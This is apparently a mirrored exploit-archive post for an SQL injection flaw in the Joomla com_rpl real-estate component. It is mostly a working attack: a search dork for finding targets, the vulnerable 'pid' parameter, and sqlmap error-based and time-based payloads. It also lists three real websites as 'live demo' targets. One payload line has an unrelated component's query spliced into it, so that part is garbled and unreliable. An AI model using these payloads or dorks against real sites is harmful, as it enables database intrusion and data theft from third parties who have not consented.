Joomla com_rpl SQL injection Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Joomla com_rpl SQL injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>############################## # [xBADGIRL21] # # [N3W PUBLIC 3XPL0IT] # # _,________ # # 0day _T _==____() -- # # /##(_)-' # # /##/ # # x21 # ############################## # Exploit Title : Joomla com_rpl SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_rpl # Vendor Homepage : https://www.realtyna.com # version : ALL # Tested on: [ BACKBOX] # MyBlog : http://xbadgirl21.blogspot.com/ # Date: 15/12/2016 # video Proof : https://www.youtube.com/watch?v=jlZ1gOM9KSk [*] To buy or Danate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz ###################### # [+] DESCRIPTION : ###################### # [+] Realtyna CRM (Client Relationship Management) Add-on # [+] for RPL is a Real Estate CRM specially designed and developed # [+] based on business process and models required by Real Estate # [+] AND an SQL injection has been Detected in this Joomla components realtyna ###################### # [+] Poc : ###################### # [pid] Get Parameter Vulnerable To SQLi # http://127.0.0.1/index.php?option=com_rpl&view=propertyshow&pid=[SQLi]&Itemid= ###################### # [+] SQLmap PoC: ###################### # Parameter: pid (GET) # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) # Payload: option=com_rpl&view=propertyshow&pid=31825' AND (SELECT 4394 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(4394=4394,1))),0x7162767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- qozi&Itemid= # # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: option=com_rpl&view=propertyshow&pid=31825' AND SLEEP(5)-- XXKX&Itemid=load: option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021 AND (SELECT 8657 FROM(SELECT #COUNT(*),CONCAT(0x71767a7171,(SELECT (ELT(8657=8657,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # --- # GET parameter 'pid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ###################### # [!] Live Demo : ###################### # http://www.myproperty.ae/index.php?option=com_rpl&view=propertyshow&pid=31825&Itemid= # http://primerealty.co.th/index.php?option=com_rpl&view=propertyshow&pid=3&Itemid # http://www.eprop.co.za/index.php?option=com_rpl&view=propertyshow&pid=31333&Itemid= ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################</BODY></HTML>